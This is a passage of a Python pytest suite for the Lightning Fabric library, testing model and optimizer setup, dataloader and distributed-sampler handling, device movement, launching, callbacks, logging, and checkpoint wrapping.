    def __init__(self):
        super().__init__()
        self.layer = torch.nn.Linear(32, 2, bias=False)

    def forward(self, x):
        out = self.layer(x)
        target = torch.ones_like(out)
        return torch.nn.functional.mse_loss(out, target)
def test_run_input_output():
    """The dynamically patched ``run()`` receives its arguments and returns the result."""

    class RunFabric(Fabric):
        run_args = ()
        run_kwargs = {}

        def run(self, *args, **kwargs):
            self.run_args = args
            self.run_kwargs = kwargs
            return "result"

    fabric = RunFabric()
    output = fabric.run(1, 2, three=3)
    assert output == "result"
    assert fabric.run_kwargs == {"three": 3}
    assert fabric.run_args == (1, 2)
@mock.patch("lightning.fabric.strategies.ddp.DistributedDataParallel")
@pytest.mark.parametrize("setup_method", ["setup", "setup_module"])
def test_setup_module(ddp_mock, setup_method):
    """The setup method lets the strategy wrap the model while keeping a reference to the original."""
    fabric = Fabric(accelerator="cpu", strategy="ddp", devices=2)
    original = nn.Linear(1, 2)
    wrapped = getattr(fabric, setup_method)(original)
    ddp_mock.assert_called_with(module=original, device_ids=ANY)
    assert wrapped.module == original
    assert wrapped.weight is original.weight
    assert wrapped.forward != original.forward
@RunIf(skip_windows=True, dynamo=True)
@pytest.mark.parametrize("setup_method", ["setup", "setup_module"])
def test_setup_compiled_module(setup_method):
    """An ``OptimizedModule`` produced by ``torch.compile`` can be passed to the setup method."""
    from torch._dynamo.eval_frame import OptimizedModule

    fabric = Fabric(devices=1)
    inner = nn.Linear(1, 2)
    compiled = torch.compile(inner)
    assert isinstance(compiled, OptimizedModule)

    wrapped = getattr(fabric, setup_method)(compiled)
    assert wrapped.module == compiled
    # attribute access falls through to the original module
    assert wrapped.weight is inner.weight
@pytest.mark.parametrize(
    "accelerator, initial_device, target_device",
    [
        ("cpu", "cpu", "cpu"),
        pytest.param("cpu", "cuda:0", "cpu", marks=RunIf(min_cuda_gpus=1)),
        pytest.param("cpu", "mps:0", "cpu", marks=RunIf(mps=True)),
        pytest.param("cuda", "cpu", "cuda:0", marks=RunIf(min_cuda_gpus=1)),
        pytest.param("cuda", "cuda:1", "cuda:0", marks=RunIf(min_cuda_gpus=2)),
        pytest.param("mps", "cpu", "mps:0", marks=RunIf(mps=True)),
    ],
)
@pytest.mark.parametrize("move_to_device", [True, False])
@pytest.mark.parametrize("setup_method", ["setup", "setup_module"])
def test_setup_module_move_to_device(setup_method, move_to_device, accelerator, initial_device, target_device):
    """Test that `move_to_device` leads to parameters being moved to the correct device and that the device
    attributes on the wrapper are updated."""
    initial_device = torch.device(initial_device)
    target_device = torch.device(target_device)
    expected_device = target_device if move_to_device else initial_device

    fabric = Fabric(accelerator=accelerator, devices=1)
    model = nn.Linear(1, 2)
    model.to(initial_device)
    setup_method = getattr(fabric, setup_method)
    fabric_model = setup_method(model, move_to_device=move_to_device)

    # all parameters on the expected device
    assert all(param.device == expected_device for param in model.parameters())
    assert all(param.device == expected_device for param in fabric_model.parameters())

    assert fabric_model.device == expected_device
    assert fabric.device == target_device

    # edge case: model has no parameters
    model = nn.Sequential()
    fabric_model = setup_method(model, move_to_device=move_to_device)
    # Bug fix: the original `assert x == a if cond else b` parsed as
    # `assert (x == a) if cond else b`, so the else branch asserted a truthy
    # device object and could never fail. Parenthesize the conditional.
    assert fabric_model.device == (target_device if move_to_device else torch.device("cpu"))
@RunIf(min_cuda_gpus=1)
@pytest.mark.parametrize("move_to_device", [True, False])
@pytest.mark.parametrize("setup_method", ["setup", "setup_module"])
def test_setup_module_parameters_on_different_devices(setup_method, move_to_device):
    """A warning is emitted when the model's parameters live on different devices before `setup()`."""
    cpu = torch.device("cpu")
    gpu = torch.device("cuda", 0)

    fabric = Fabric(accelerator="cuda", devices=1)
    part0 = nn.Linear(1, 2).to(cpu)
    part1 = nn.Linear(1, 2).to(gpu)
    model = nn.Sequential(part0, part1)
    setup = getattr(fabric, setup_method)

    if not move_to_device:
        with no_warning_call(expected_warning=PossibleUserWarning, match="has parameters on different devices"):
            setup(model, move_to_device=move_to_device)
    else:
        with pytest.warns(PossibleUserWarning, match="has parameters on different devices"):
            fabric_model = setup(model, move_to_device=move_to_device)

        # everything was consolidated onto the GPU
        assert fabric_model.device == gpu
        assert part0.weight.device == part0.bias.device == gpu
        assert part1.weight.device == part1.bias.device == gpu
def test_setup_module_and_optimizers():
    """`setup()` handles zero, one, or several optimizers."""
    fabric = Fabric(devices=1)
    model = nn.Linear(1, 2)
    opt_sgd = torch.optim.SGD(model.parameters(), lr=0.1)
    opt_adam = torch.optim.Adam(model.parameters(), lr=0.1)

    # without any optimizer
    wrapped_model = fabric.setup(model)
    assert isinstance(wrapped_model, _FabricModule)
    assert wrapped_model.module is model

    # with a single optimizer
    wrapped_model, wrapped_opt = fabric.setup(model, opt_sgd)
    assert isinstance(wrapped_model, _FabricModule)
    assert isinstance(wrapped_opt, _FabricOptimizer)
    assert wrapped_model.module is model
    assert wrapped_opt.optimizer is opt_sgd

    # with several optimizers at once
    wrapped_model, wrapped_opt0, wrapped_opt1 = fabric.setup(model, opt_sgd, opt_adam)
    assert isinstance(wrapped_model, _FabricModule)
    assert isinstance(wrapped_opt0, _FabricOptimizer)
    assert isinstance(wrapped_opt1, _FabricOptimizer)
    assert wrapped_model.module is model
    assert wrapped_opt0.optimizer is opt_sgd
    assert wrapped_opt1.optimizer is opt_adam
def test_setup_optimizers():
    """`setup_optimizers()` wraps one or more optimizers."""
    fabric = Fabric()
    model = nn.Linear(1, 2)
    opt_sgd = torch.optim.SGD(model.parameters(), lr=0.1)
    opt_adam = torch.optim.Adam(model.parameters(), lr=0.1)

    # a single optimizer
    wrapped = fabric.setup_optimizers(opt_sgd)
    assert isinstance(wrapped, _FabricOptimizer)
    assert wrapped.optimizer is opt_sgd

    # several optimizers at once
    wrapped0, wrapped1 = fabric.setup_optimizers(opt_sgd, opt_adam)
    assert isinstance(wrapped0, _FabricOptimizer)
    assert isinstance(wrapped1, _FabricOptimizer)
    assert wrapped0.optimizer is opt_sgd
    assert wrapped1.optimizer is opt_adam
def test_setup_twice_fails():
    """Passing an already-wrapped model or optimizer to `setup` raises."""
    fabric = Fabric(devices=1)
    model = nn.Linear(1, 2)
    optimizer = torch.optim.Adam(model.parameters())

    wrapped_model, wrapped_optimizer = fabric.setup(model, optimizer)
    with pytest.raises(ValueError, match="A model should be passed only once to the"):
        fabric.setup(wrapped_model, optimizer)

    wrapped_model, wrapped_optimizer = fabric.setup(model, optimizer)
    with pytest.raises(ValueError, match="An optimizer should be passed only once to the"):
        fabric.setup(model, wrapped_optimizer)
def test_setup_module_twice_fails():
    """Passing an already-wrapped model to `setup_module` raises."""
    fabric = Fabric(devices=1)
    model = nn.Linear(1, 2)

    wrapped = fabric.setup_module(model)
    with pytest.raises(ValueError, match="A model should be passed only once to the"):
        fabric.setup_module(wrapped)
def test_setup_optimizers_twice_fails():
    """Passing an already-wrapped optimizer to `setup_optimizers` raises."""
    fabric = Fabric()
    model = nn.Linear(1, 2)
    optimizer = torch.optim.Adam(model.parameters())

    wrapped = fabric.setup_optimizers(optimizer)
    with pytest.raises(ValueError, match="An optimizer should be passed only once to"):
        fabric.setup_optimizers(wrapped)
@pytest.mark.parametrize("strategy_cls", [DeepSpeedStrategy, XLAStrategy])
def test_setup_optimizers_not_supported(strategy_cls):
    """`setup_optimizers` refuses strategies that must set up model and optimizers jointly."""
    fabric = Fabric()
    module = nn.Linear(1, 2)
    opt = torch.optim.Adam(module.parameters())
    fabric._strategy = Mock(spec=strategy_cls)

    with pytest.raises(RuntimeError, match=escape("requires the model and optimizer(s) to be set up jointly through")):
        fabric.setup_optimizers(opt)
def test_setup_tracks_num_models():
    """Each call to `setup`/`setup_module` increments the model counter."""
    fabric = Fabric(devices=1)
    module = nn.Linear(1, 2)
    opt = torch.optim.Adam(module.parameters())

    assert fabric._models_setup == 0
    fabric.setup(module, opt)
    assert fabric._models_setup == 1

    fabric.setup(module, opt)
    assert fabric._models_setup == 2

    fabric.setup_module(module)
    assert fabric._models_setup == 3
def test_setup_dataloaders_unsupported_input():
    """`setup_dataloaders` rejects non-DataLoader objects and an empty call."""
    fabric = Fabric()

    with pytest.raises(TypeError, match="Only PyTorch DataLoader are currently supported"):
        fabric.setup_dataloaders(range(2))  # type: ignore

    with pytest.raises(ValueError, match="`setup_dataloaders` requires at least one dataloader"):
        fabric.setup_dataloaders()
def test_setup_dataloaders_return_type():
    """Dataloaders come back wrapped as `_FabricDataLoader`, in the order given."""
    fabric = Fabric(devices=1)

    # a single dataloader
    single = fabric.setup_dataloaders(DataLoader(range(2)))
    assert isinstance(single, _FabricDataLoader)

    # several dataloaders at once
    dataset_a, dataset_b = Mock(), Mock()
    wrapped_a, wrapped_b = fabric.setup_dataloaders(DataLoader(dataset_a), DataLoader(dataset_b))
    assert isinstance(wrapped_a, _FabricDataLoader)
    assert isinstance(wrapped_b, _FabricDataLoader)
    assert wrapped_a.dataset is dataset_a
    assert wrapped_b.dataset is dataset_b
@mock.patch("lightning.fabric.fabric._replace_dunder_methods")
def test_setup_dataloaders_captures_dataloader_arguments(ctx_manager):
    """Fabric wraps its run method in a context manager that intercepts DataLoader constructor args."""

    class RunFabric(Fabric):
        def run(self):
            # one context for BatchSampler and one for DataLoader
            assert ctx_manager().__enter__.call_count == 2

    RunFabric().run()
    assert ctx_manager().__exit__.call_count == 2
def test_setup_dataloaders_raises_for_unknown_custom_args():
    """Custom dataloaders with unknown constructor args created outside `run` cannot be re-instantiated."""
    fabric = Fabric()

    class CustomDataLoader(DataLoader):
        def __init__(self, new_arg, *args, **kwargs):
            super().__init__(range(5), *args, **kwargs)

    # Created outside the run function, so its init args were never intercepted
    dataloader = CustomDataLoader(2, batch_size=2)
    expected = (
        r"Trying to inject custom `Sampler` into the `CustomDataLoader` instance.*"
        r"The missing attributes are \['new_arg'\]"
    )
    with pytest.raises(MisconfigurationException, match=expected):
        fabric.setup_dataloaders(dataloader)
def test_setup_dataloaders_twice_fails():
    """Test that calling setup_dataloaders with a dataloader that is already wrapped fails."""
    fabric = Fabric()
    dataloader = DataLoader(range(2))
    fabric_dataloader = fabric.setup_dataloaders(dataloader)
    # Passing the already-wrapped loader back in must be rejected.
    with pytest.raises(ValueError, match="A dataloader should be passed only once to the"):
        fabric.setup_dataloaders(fabric_dataloader)
@mock.patch(
    "lightning.fabric.fabric.Fabric.device",
    new_callable=PropertyMock,
    return_value=torch.device("cuda", 1),
)
def test_setup_dataloaders_move_to_device(fabric_device_mock):
    """Test that the setup configures FabricDataLoader to move the data to the device automatically."""
    fabric = Fabric(devices=1)
    # With move_to_device=False the wrapper must not even query the device.
    fabric_dataloaders = fabric.setup_dataloaders(DataLoader(Mock()), DataLoader(Mock()), move_to_device=False)
    assert all(dl.device is None for dl in fabric_dataloaders)
    fabric_device_mock.assert_not_called()

    fabric = Fabric(devices=1)
    fabric_dataloaders = fabric.setup_dataloaders(DataLoader(Mock()), DataLoader(Mock()), move_to_device=True)
    assert all(dl.device == torch.device("cuda", 1) for dl in fabric_dataloaders)
    fabric_device_mock.assert_called()
def test_setup_dataloaders_distributed_sampler_not_needed():
    """Test that `use_distributed_sampler` option has no effect when no distributed sampler is needed."""
    custom_sampler = Mock(spec=Sampler)
    dataloader = DataLoader(Mock(), sampler=custom_sampler)

    # keep the custom sampler when there is nothing to replace
    # (single-device run: no distributed sampler is ever required)
    fabric = Fabric(devices=1)
    fabric_dataloader = fabric.setup_dataloaders(dataloader, use_distributed_sampler=True)
    assert fabric_dataloader.sampler is custom_sampler
def test_setup_dataloaders_distributed_sampler_shuffle():
    """Test that the DataLoader(shuffle=True|False) setting gets carried over correctly into the distributed
    sampler."""
    fabric = Fabric(accelerator="cpu", strategy="ddp_spawn", devices=2)
    # no fabric.launch(): pretend we are on rank 0 now
    dataset = TensorDataset(torch.arange(8))

    # shuffling turned off: rank 0 of 2 sees every other sample, in order
    no_shuffle_dataloaders = [
        DataLoader(dataset),
        DataLoader(dataset, shuffle=False),
        DataLoader(dataset, sampler=SequentialSampler(dataset)),
    ]
    for dataloader in no_shuffle_dataloaders:
        dataloader = fabric.setup_dataloaders(dataloader)
        assert [t[0].item() for t in iter(dataloader)] == [0, 2, 4, 6]

    # shuffling turned on: the expected order is pinned by the seed below
    shuffle_dataloaders = [DataLoader(dataset, shuffle=True), DataLoader(dataset, sampler=RandomSampler(dataset))]
    for dataloader in shuffle_dataloaders:
        seed_everything(1)
        dataloader = fabric.setup_dataloaders(dataloader)
        assert [t[0].item() for t in iter(dataloader)] == [5, 2, 7, 1]
@pytest.mark.parametrize("shuffle", [True, False])
@pytest.mark.parametrize("batch_size", [1, 2, 3])
def test_setup_dataloaders_distributed_sampler_parity(shuffle, batch_size):
    """Test that the distributed sampler setup in Fabric leads to the same sequence of data as in raw PyTorch."""
    torch.manual_seed(1)
    fabric = Fabric(accelerator="cpu", strategy="ddp", devices=2)
    # no fabric.launch(): pretend we are on rank 0 now
    dataset = torch.arange(10)
    # Reference loader configured by hand the way a raw PyTorch user would.
    torch_dataloader = DataLoader(
        dataset,
        sampler=DistributedSampler(dataset, num_replicas=2, rank=0, shuffle=shuffle),
        batch_size=batch_size,
    )
    fabric_dataloader = DataLoader(dataset, shuffle=shuffle, batch_size=batch_size)
    fabric_dataloader = fabric.setup_dataloaders(fabric_dataloader)

    def fetch_epoch(loader):
        iterator = iter(loader)
        # we fetch 2 batches per epoch
        return torch.cat((next(iterator), next(iterator)))

    # 1st epoch
    # PyTorch users needs to set the epoch, while in Fabric it gets handled automatically
    torch_dataloader.sampler.set_epoch(0)
    torch_data = fetch_epoch(torch_dataloader)
    fabric_data = fetch_epoch(fabric_dataloader)
    assert torch.equal(torch_data, fabric_data)

    # 2nd epoch
    # PyTorch users needs to set the epoch, while in Fabric it gets handled automatically
    torch_dataloader.sampler.set_epoch(1)
    torch_data = fetch_epoch(torch_dataloader)
    fabric_data = fetch_epoch(fabric_dataloader)
    assert torch.equal(torch_data, fabric_data)
    # Fabric's wrapper must have advanced the sampler epoch on its own.
    assert torch_dataloader.sampler.epoch == 1
    assert fabric_dataloader._dataloader.sampler.epoch == 1
@mock.patch.dict(os.environ, {}, clear=True)
def test_seed_everything():
    """Test that seed everything is static and sets the worker init function on the dataloader."""
    Fabric.seed_everything(3)

    fabric = Fabric(devices=1)
    fabric_dataloader = fabric.setup_dataloaders(DataLoader(Mock()))
    assert fabric_dataloader.worker_init_fn.func is pl_worker_init_function
    # The seed configuration must be exported so worker processes can pick it up.
    assert os.environ == {"PL_GLOBAL_SEED": "3", "PL_SEED_WORKERS": "1"}
@pytest.mark.parametrize(
    "strategy",
    [
        "dp",
        "ddp",
        "ddp_spawn",
        pytest.param("ddp_fork", marks=RunIf(skip_windows=True)),
        pytest.param("deepspeed", marks=RunIf(deepspeed=True)),
    ],
)
def test_setup_dataloaders_replace_custom_sampler(strategy):
    """Test that asking to replace a custom sampler results in an error when a distributed sampler would be
    needed."""
    custom_sampler = Mock(spec=Sampler)
    dataloader = DataLoader(Mock(), sampler=custom_sampler)

    # explicitly asking to replace when a custom sampler is already configured raises an exception
    fabric = Fabric(accelerator="cpu", strategy=strategy, devices=2)
    # Only strategies that shard data expose `distributed_sampler_kwargs`.
    if hasattr(fabric.strategy, "distributed_sampler_kwargs"):
        with pytest.raises(TypeError, match="You seem to have configured a sampler in your DataLoader"):
            fabric.setup_dataloaders(dataloader, use_distributed_sampler=True)

    # setting `use_distributed_sampler=False` leaves the sampler untouched
    fabric_dataloader = fabric.setup_dataloaders(dataloader, use_distributed_sampler=False)
    assert fabric_dataloader.sampler is custom_sampler
@pytest.mark.parametrize(
    "strategy",
    [
        "dp",
        "ddp",
        "ddp_spawn",
        pytest.param("ddp_fork", marks=RunIf(skip_windows=True)),
        pytest.param("deepspeed", marks=RunIf(deepspeed=True)),
    ],
)
@pytest.mark.parametrize("shuffle", [True, False])
def test_setup_dataloaders_replace_standard_sampler(shuffle, strategy):
    """Test that Fabric replaces the default samplers with DistributedSampler automatically."""
    fabric = Fabric(accelerator="cpu", strategy=strategy, devices=2)
    is_distributed = hasattr(fabric.strategy, "distributed_sampler_kwargs")
    fabric_dataloader = fabric.setup_dataloaders(DataLoader(range(3), shuffle=shuffle))
    # Only data-parallel strategies should get a DistributedSampler injected.
    assert not is_distributed or isinstance(fabric_dataloader.sampler, DistributedSampler)
@pytest.mark.parametrize(
    "accelerator, expected",
    [
        ("cpu", "cpu"),
        pytest.param("cuda", "cuda:0", marks=RunIf(min_cuda_gpus=1)),
        pytest.param("gpu", "cuda:0", marks=RunIf(min_cuda_gpus=1)),
        pytest.param("tpu", "xla:0", marks=RunIf(tpu=True, standalone=True)),
        pytest.param("mps", "mps:0", marks=RunIf(mps=True)),
        pytest.param("gpu", "mps:0", marks=RunIf(mps=True)),
    ],
)
@mock.patch.dict(os.environ, os.environ.copy(), clear=True)
def test_to_device(accelerator, expected):
    """Test that the to_device method can move various objects to the device determined by the accelerator."""
    if accelerator == "tpu":
        from torch_xla.experimental import pjrt

        # NOTE(review): the non-PjRt (legacy XRT) runtime appears to index the
        # first XLA device from 1 rather than 0 — confirm against torch_xla docs.
        if not pjrt.using_pjrt():
            expected = "xla:1"

    class RunFabric(Fabric):
        def run(self):
            expected_device = torch.device(expected)

            # module
            module = torch.nn.Linear(2, 3)
            module = fabric.to_device(module)
            assert all(param.device == expected_device for param in module.parameters())

            # tensor
            tensor = torch.rand(2, 2)
            tensor = fabric.to_device(tensor)
            assert tensor.device == expected_device

            # collection: tensors inside containers are moved recursively
            collection = {"data": torch.rand(2, 2), "int": 1}
            collection = fabric.to_device(collection)
            assert collection["data"].device == expected_device

    fabric = RunFabric(accelerator=accelerator, devices=1)
    fabric.run()
def test_rank_properties():
    """Test that the rank properties are determined by the strategy."""
    fabric = Fabric()
    fabric._strategy = Mock(spec=Strategy)
    # Each Fabric rank property must simply mirror the strategy's attribute.
    for prop_name, expected in [
        ("world_size", 1000),
        ("global_rank", 100),
        ("local_rank", 10),
        ("node_rank", 1),
    ]:
        setattr(fabric._strategy, prop_name, expected)
        assert getattr(fabric, prop_name) == expected
def test_backward():
    """Test that backward() calls into the precision plugin."""
    fabric = Fabric()
    # NOTE(review): the strategy is mocked with the Precision spec — presumably
    # because only its `backward` method matters for this test; confirm intent.
    fabric._strategy = Mock(spec=Precision)
    loss = Mock()
    fabric.backward(loss, "arg", keyword="kwarg")
    # The second argument (the module) is None because no model was set up.
    fabric._strategy.backward.assert_called_with(loss, None, "arg", keyword="kwarg")
@RunIf(deepspeed=True, mps=False)
def test_backward_model_input_required():
    """Test that when using deepspeed and multiple models, backward() requires the model as input."""
    fabric = Fabric(strategy="deepspeed")

    model0 = nn.Linear(1, 2)
    model1 = nn.Linear(1, 2)

    optimizer0 = torch.optim.Adam(model0.parameters())
    optimizer1 = torch.optim.Adam(model1.parameters())

    # Bypass the real deepspeed engine setup; the identity keeps the originals.
    fabric._strategy.setup_module_and_optimizers = lambda *args: args

    fabric.setup(model0, optimizer0)
    fabric.setup(model1, optimizer1)

    loss = model0(torch.randn(1, 1, device=fabric.device)).sum()

    # With two models registered, Fabric cannot tell which engine to use.
    with pytest.raises(ValueError, match="please provide the model used to perform"):
        fabric.backward(loss)
def test_autocast():
    """Test that the Fabric autocast context manager lets the precision plugin handle casting."""
    fabric = Fabric()
    fabric._precision.forward_context = MagicMock()

    fabric._precision.forward_context().__enter__.assert_not_called()
    with fabric.autocast():
        # Entering fabric.autocast() must enter the plugin's forward context...
        fabric._precision.forward_context().__enter__.assert_called()
    # ...and leaving it must exit that context again.
    fabric._precision.forward_context().__exit__.assert_called()
def test_no_backward_sync():
    """Test that `Fabric.no_backward_sync()` validates the strategy and model is compatible."""
    fabric = Fabric(devices=1)
    model = nn.Linear(3, 3)
    # Raw (un-setup) modules are rejected outright.
    with pytest.raises(TypeError, match="You need to set up the model first"), fabric.no_backward_sync(model):
        pass

    model = fabric.setup(model)

    # pretend that the strategy does not support skipping backward sync
    fabric._strategy = Mock(spec=ParallelStrategy, _backward_sync_control=None)
    with pytest.warns(
        PossibleUserWarning, match="The `ParallelStrategy` does not support skipping the"
    ), fabric.no_backward_sync(model):
        pass

    # for single-device strategies, it becomes a no-op without warning
    fabric._strategy = Mock(spec=SingleDeviceStrategy, _backward_sync_control=MagicMock())
    with fabric.no_backward_sync(model):
        pass
    fabric._strategy._backward_sync_control.no_backward_sync.assert_not_called()

    # pretend that the strategy supports skipping backward sync
    fabric._strategy = Mock(_backward_sync_control=MagicMock())
    # disabling the context manager makes it a no-op
    with fabric.no_backward_sync(model, enabled=False):
        pass
    fabric._strategy._backward_sync_control.no_backward_sync.assert_not_called()
    # when enabled, the wrapped module gets passed down
    with fabric.no_backward_sync(model):
        pass
    fabric._strategy._backward_sync_control.no_backward_sync.assert_called_once_with(model._forward_module)
def test_launch_without_function():
    """Test the various ways `Fabric.launch()` can be called."""

    # default: no launcher, single process
    fabric = Fabric()
    nothing = Mock()
    fabric.launch(nothing)
    nothing.assert_called()

    # with a launcher on the strategy
    fabric = Fabric()
    fabric._strategy._launcher = Mock()
    fabric.launch()
    # launch() without a function defers to the strategy's launcher
    fabric._strategy._launcher.launch.assert_called()
def test_launch_with_function():
    """Test the various ways `Fabric.launch(function)` can be called."""

    def fn_without_args():
        pass

    fabric = Fabric()
    with pytest.raises(TypeError, match="needs to take at least one argument"):
        fabric.launch(fn_without_args)

    def fn_with_one_arg(arg):
        # The launched function receives the Fabric instance itself.
        assert isinstance(arg, Fabric)
        fn_with_one_arg.called = True

    fabric = Fabric()
    fabric.launch(fn_with_one_arg)
    assert fn_with_one_arg.called

    # common user mistake: passing the function's *result* instead of the function
    fabric = Fabric()
    with pytest.raises(TypeError, match="needs to be a callable"):
        fabric.launch(fn_with_one_arg(fabric))
@mock.patch.dict(os.environ, {"LT_CLI_USED": "1"})  # pretend we are using the CLI
def test_launch_and_cli_not_allowed():
    """When launched through the CLI the processes already exist, so a second `.launch()` must be rejected."""
    fabric = Fabric(devices=1)
    with pytest.raises(RuntimeError, match=escape("Calling `.launch()` again is not allowed")):
        fabric.launch()
@RunIf(mps=False)
@pytest.mark.parametrize("strategy", ("xla", "ddp_spawn"))
def test_launch_and_strategies_unsupported_combinations(strategy, xla_available):
    """Spawn/fork-based strategies cannot launch in place; they need a function to run in the new processes."""
    fabric = Fabric(strategy=strategy)
    with pytest.raises(TypeError, match=r"launch\(\)` needs to be called with a function"):
        fabric.launch()
@mock.patch.dict(os.environ, {"LT_CLI_USED": "1"})  # pretend we are using the CLI
def test_overridden_run_and_cli_not_allowed():
    class FabricWithRun(Fabric):
        def run(self):
            pass

    # Overriding run() is the script-style API and is incompatible with the CLI,
    # so the incompatibility is reported at construction time.
    with pytest.raises(TypeError, match=escape("Overriding `Fabric.run()` and launching from the CLI is not allowed")):
        FabricWithRun()
def test_module_sharding_context():
    """Test that the sharding context manager gets applied when the strategy supports it and is a no-op
    otherwise."""
    fabric = Fabric()
    fabric._strategy = MagicMock(spec=DDPStrategy, module_sharded_context=Mock())
    # DDP does not implement the _Sharded interface, so this must be a no-op
    # (apart from the deprecation warning for the old API name).
    with pytest.warns(DeprecationWarning, match="sharded_model"), fabric.sharded_model():
        pass
    fabric._strategy.module_sharded_context.assert_not_called()

    fabric._strategy = MagicMock(spec=_Sharded)
    with pytest.warns(DeprecationWarning, match="sharded_model"), fabric.sharded_model():
        pass
    fabric._strategy.module_sharded_context.assert_called_once()
def test_init_module_context(monkeypatch):
    """Test that the strategy returns the context manager for initializing the module."""
    import lightning.fabric

    fabric = Fabric(accelerator="cpu")
    strategy = MagicMock(spec=Strategy, module_init_context=MagicMock(), root_device=torch.device("cuda", 0))
    fabric._strategy = strategy
    with fabric.init_module():
        pass
    strategy.module_init_context.assert_called_once()
    strategy.reset_mock()

    # Pretend we are using PyTorch < 2.0, where direct-on-device init is unavailable
    monkeypatch.setattr(lightning.fabric.fabric, "_TORCH_GREATER_EQUAL_2_0", False)
    with pytest.warns(PossibleUserWarning, match="can't place the model parameters on the device"):  # noqa: SIM117
        with fabric.init_module():
            pass
    strategy.module_init_context.assert_called_once()
def test_callbacks_input():
    """Test the various ways in which callbacks can be registered with Fabric."""
    callback0 = Mock()
    callback1 = Mock()

    # single callback: normalized into a one-element list
    fabric = Fabric(callbacks=callback0)
    assert fabric._callbacks == [callback0]

    # multiple callbacks: registration order preserved
    fabric = Fabric(callbacks=[callback0, callback1])
    assert fabric._callbacks == [callback0, callback1]
def test_call():
    """Test that `fabric.call` triggers the callback implementations."""
    callback0 = Mock()
    callback1 = Mock()
    fabric = Fabric(callbacks=[callback0, callback1])

    # No arguments
    fabric.call("on_train_end")
    callback0.on_train_end.assert_called_once()
    callback1.on_train_end.assert_called_once()

    # Optional arguments
    fabric.call("on_train_end", "positional", keyword="keyword")
    callback0.on_train_end.assert_called_with("positional", keyword="keyword")
    callback1.on_train_end.assert_called_with("positional", keyword="keyword")

    # Some callbacks don't implement the requested hook
    callback0 = Mock()
    callback1 = Mock(spec_set={})  # `on_train_end` not defined for this callback
    fabric = Fabric(callbacks=[callback0, callback1])
    fabric.call("on_train_end")
    callback0.on_train_end.assert_called_once()
    assert not callback1.mock_calls  # no methods were called on callback1

    # Skip callback attributes that are not callable
    callback = Mock(not_a_method=1)
    fabric = Fabric(callbacks=[callback])
    with pytest.warns(UserWarning, match="Skipping the callback `Mock.not_a_method`"):
        fabric.call("not_a_method")
    # Fix: the original asserted on `callback1` (left over from the previous
    # section and not registered on this fabric, making the check vacuous).
    # What matters here is that nothing got invoked on the registered callback.
    assert not callback.mock_calls
def test_loggers_input():
    """Test the various ways in which loggers can be registered with Fabric."""
    logger0 = Mock()
    logger1 = Mock()

    # no logger: both None and an empty list normalize to []
    fabric = Fabric(loggers=None)
    assert fabric._loggers == []
    fabric = Fabric(loggers=[])
    assert fabric._loggers == []

    # single logger
    fabric = Fabric(loggers=logger0)
    assert fabric._loggers == [logger0]

    # multiple loggers
    fabric = Fabric(loggers=[logger0, logger1])
    assert fabric._loggers == [logger0, logger1]
def test_log():
    """Test that `fabric.log` sends the metrics to each logger."""
    logger0 = Mock()
    logger1 = Mock()
    fabric = Fabric(loggers=[logger0, logger1])

    # Without an explicit step, step=None is forwarded unchanged.
    fabric.log("test", 1)
    logger0.log_metrics.assert_called_with(metrics={"test": 1}, step=None)
    logger1.log_metrics.assert_called_with(metrics={"test": 1}, step=None)

    fabric.log("test", 2, step=15)
    logger0.log_metrics.assert_called_with(metrics={"test": 2}, step=15)
    logger1.log_metrics.assert_called_with(metrics={"test": 2}, step=15)
def test_log_dict():
    """Test that `fabric.log_dict` sends the metrics dict to each logger."""
    logger0 = Mock()
    logger1 = Mock()
    fabric = Fabric(loggers=[logger0, logger1])

    # The whole dict goes to every registered logger in one call.
    fabric.log_dict({"foo": 1, "bar": 2}, step=None)
    logger0.log_metrics.assert_called_with(metrics={"foo": 1, "bar": 2}, step=None)
    logger1.log_metrics.assert_called_with(metrics={"foo": 1, "bar": 2}, step=None)

    fabric.log_dict({"foo": 3, "bar": 4}, step=15)
    logger0.log_metrics.assert_called_with(metrics={"foo": 3, "bar": 4}, step=15)
    logger1.log_metrics.assert_called_with(metrics={"foo": 3, "bar": 4}, step=15)
def test_log_dict_input_parsing():
    """Test validation of input data types and preprocessing."""
    logger = Mock()
    fabric = Fabric(loggers=[logger])

    # Tensor scalar, 0 dims: converted to a plain Python number
    fabric.log("log", torch.tensor(1))
    logger.log_metrics.assert_called_with(metrics={"log": 1}, step=None)
    fabric.log_dict({"log_dict": torch.tensor(1)})
    logger.log_metrics.assert_called_with(metrics={"log_dict": 1}, step=None)

    # Tensor scalar, 1 dims: single-element tensors are unwrapped as well
    fabric.log("log", torch.tensor([2]))
    logger.log_metrics.assert_called_with(metrics={"log": 2}, step=None)
    fabric.log_dict({"log_dict": torch.tensor([2])})
    logger.log_metrics.assert_called_with(metrics={"log_dict": 2}, step=None)

    # Tensor, multiple dims: cannot be logged as a scalar metric
    with pytest.raises(ValueError, match="it cannot be converted to a scalar."):
        fabric.log("log", torch.tensor([3, 4]))

    with pytest.raises(ValueError, match="it cannot be converted to a scalar."):
        fabric.log_dict({"log_dict": torch.tensor([3, 4])})
@pytest.mark.parametrize("setup", [True, False])
def test_save_wrapped_objects(setup, tmp_path):
    """Test that when modules and optimizers are in the state, they get unwrapped properly."""
    fabric = Fabric(devices=1)
    save_checkpoint_mock = Mock()
    fabric.strategy.save_checkpoint = save_checkpoint_mock

    unwrapped_model = BoringModel()
    unwrapped_optimizer = torch.optim.Adam(unwrapped_model.parameters())

    if setup:
        model, optimizer = fabric.setup(unwrapped_model, unwrapped_optimizer)
        assert isinstance(model, _FabricModule)
        assert isinstance(optimizer, _FabricOptimizer)
    else:
        model, optimizer = unwrapped_model, unwrapped_optimizer

    anything = {"cocofruit": 1}
    state = {"model": model, "optimizer": optimizer, "anything": anything}
    # Regardless of wrapping, the strategy must receive the raw objects.
    expected = {"model": unwrapped_model, "optimizer": unwrapped_optimizer, "anything": anything}
    fabric.save(tmp_path, state)
    save_checkpoint_mock.assert_called_with(state=expected, path=tmp_path)
@pytest.mark.parametrize("setup", [True, False])
def test_load_wrapped_objects(setup, tmp_path):
    """Test that loading happens in-place for model, optimizer, and other user data."""
    fabric = Fabric(accelerator="cpu")

    expected_remainder = {"extra": "data"}

    def mocked_load_checkpoint(path, state):
        # The strategy must see the raw (unwrapped) objects...
        assert not isinstance(state["model"], _FabricModule)
        assert not isinstance(state["optimizer"], _FabricOptimizer)
        # ...and it mutates the caller's state dict in place.
        state.update({"int": 5, "dict": {"x": 1}})
        return expected_remainder

    fabric.strategy.load_checkpoint = mocked_load_checkpoint

    unwrapped_model = BoringModel()
    unwrapped_optimizer = torch.optim.Adam(unwrapped_model.parameters())

